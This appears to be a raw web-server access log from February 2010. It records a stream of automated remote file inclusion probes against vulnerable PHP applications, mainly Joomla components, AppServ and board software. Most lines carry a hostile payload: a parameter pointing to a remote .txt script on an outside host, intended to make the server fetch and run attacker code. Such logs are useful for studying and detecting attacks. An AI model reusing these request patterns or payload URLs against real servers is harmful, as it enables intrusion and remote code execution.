210.205.6.233 - - [20/Feb/2010:05:21:36 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:05:21:36 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:05:21:36 -0800] "GET /logs/access_100208.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:05:21:36 -0800] "GET /logs/access_100126.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:05:21:43 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:05:21:43 -0800] "GET /logs/access_100208.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:05:21:43 -0800] "GET /logs/access_100126.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:05:21:43 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:05:22:21 -0800] "GET /logs/access_100126.log////appserv/main.php?appserv_root=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:05:22:21 -0800] "GET ///appserv/main.php?appserv_root=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:05:22:21 -0800] "GET /logs////appserv/main.php?appserv_root=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:05:22:58 -0800] "GET /logs/access_100206.log////appserv/main.php?appserv_root=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:05:25:25 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:05:25:25 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:05:25:25 -0800] "GET /logs/access_100119.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:05:25:25 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [20/Feb/2010:05:27:13 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [20/Feb/2010:05:27:14 -0800] "GET /logs/access_100123.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [20/Feb/2010:05:27:14 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:05:27:24 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:05:27:24 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:05:27:24 -0800] "GET /logs/access_100119.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:05:27:24 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [20/Feb/2010:05:27:42 -0800] "GET /logs/access_100126.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:05:28:28 -0800] "GET /logs/access_100126.log/errors.php?error=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:05:28:28 -0800] "GET /errors.php?error=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:05:28:28 -0800] "GET /logs/errors.php?error=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:05:28:29 -0800] "GET /logs/errors.php?error=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:05:28:29 -0800] "GET /errors.php?error=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:05:28:29 -0800] "GET /logs/access_100126.log/errors.php?error=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:05:28:56 -0800] "GET /appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:05:28:56 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:05:28:56 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:05:28:56 -0800] "GET /logs/access_100111.log//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:05:28:56 -0800] "GET /appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:05:28:56 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:05:28:56 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:05:28:56 -0800] "GET /logs/access_100111.log//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [20/Feb/2010:05:30:37 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [20/Feb/2010:05:30:38 -0800] "GET /logs/access_100126.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [20/Feb/2010:05:30:40 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [20/Feb/2010:05:31:17 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.puaga.com"
213.239.230.130 - - [20/Feb/2010:05:31:18 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.puaga.com"
61.97.159.28 - - [20/Feb/2010:05:31:54 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [20/Feb/2010:05:31:54 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [20/Feb/2010:05:31:54 -0800] "GET /logs/access_100126.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:05:33:16 -0800] "GET /logs/errors.php?error=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:05:33:16 -0800] "GET /errors.php?error=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:05:33:16 -0800] "GET /logs/access_100126.log/errors.php?error=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:05:35:10 -0800] "GET /logs/access_100206.log/errors.php?error=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:05:36:25 -0800] "GET /logs/access_100202.log%20%20///bbs///delete_all.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:05:39:33 -0800] "GET /errors.php?error=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:05:39:34 -0800] "GET /logs/access_100126.log/errors.php?error=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:05:39:34 -0800] "GET /logs/errors.php?error=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:05:40:38 -0800] "GET ///appserv/main.php?appserv_root=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:05:40:38 -0800] "GET /logs////appserv/main.php?appserv_root=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:05:40:39 -0800] "GET /logs/access_100126.log////appserv/main.php?appserv_root=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:05:41:18 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:05:41:22 -0800] "GET /logs/access_100206.log////appserv/main.php?appserv_root=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:05:41:23 -0800] "GET /logs/access_100128.log//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:05:41:23 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:05:42:17 -0800] "GET /logs/access_100211.log//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:05:42:24 -0800] "GET /logs/access_100206.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:05:42:24 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:05:42:24 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:05:42:24 -0800] "GET /logs/access_100127.log%20%20/dministrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:05:42:24 -0800] "GET /dministrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:05:42:24 -0800] "GET /logs/dministrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:05:42:46 -0800] "GET /logs/access_100121.log%20%20/dministrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:05:43:04 -0800] "GET /logs/access_100118.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:05:44:52 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:05:44:52 -0800] "GET /delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:05:44:52 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:05:44:54 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:05:44:54 -0800] "GET /logs/access_100206.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:05:44:55 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:05:44:55 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:05:44:55 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:05:44:55 -0800] "GET /delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:05:44:57 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:05:45:13 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:05:45:42 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:05:45:43 -0800] "GET /logs/access_100206.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:05:45:44 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:05:46:14 -0800] "GET /delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:05:46:14 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:05:46:15 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:05:46:22 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:05:47:01 -0800] "GET /delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:05:47:01 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:05:47:01 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:05:47:06 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:05:47:11 -0800] "GET /logs/access_100202.log%20%20///bbs///delete_all.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:05:47:59 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:05:47:59 -0800] "GET /logs/access_100206.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:05:47:59 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:05:48:21 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:05:48:21 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:05:48:22 -0800] "GET /logs/access_100206.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:05:49:06 -0800] "GET /logs/access_100206.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:05:49:11 -0800] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:05:49:11 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:05:49:11 -0800] "GET /logs/access_100129.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:05:49:17 -0800] "GET /logs/access_100118.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:05:49:23 -0800] "GET /logs/access_100121.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:05:50:26 -0800] "GET /logs/access_100118.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:05:50:30 -0800] "GET /bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:05:50:30 -0800] "GET /logs//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:05:50:30 -0800] "GET /logs/access_100128.log//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:05:50:45 -0800] "GET /logs/access_100214.log//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:05:50:48 -0800] "GET /logs/access_100118.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:05:50:48 -0800] "GET /logs/access_100206.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
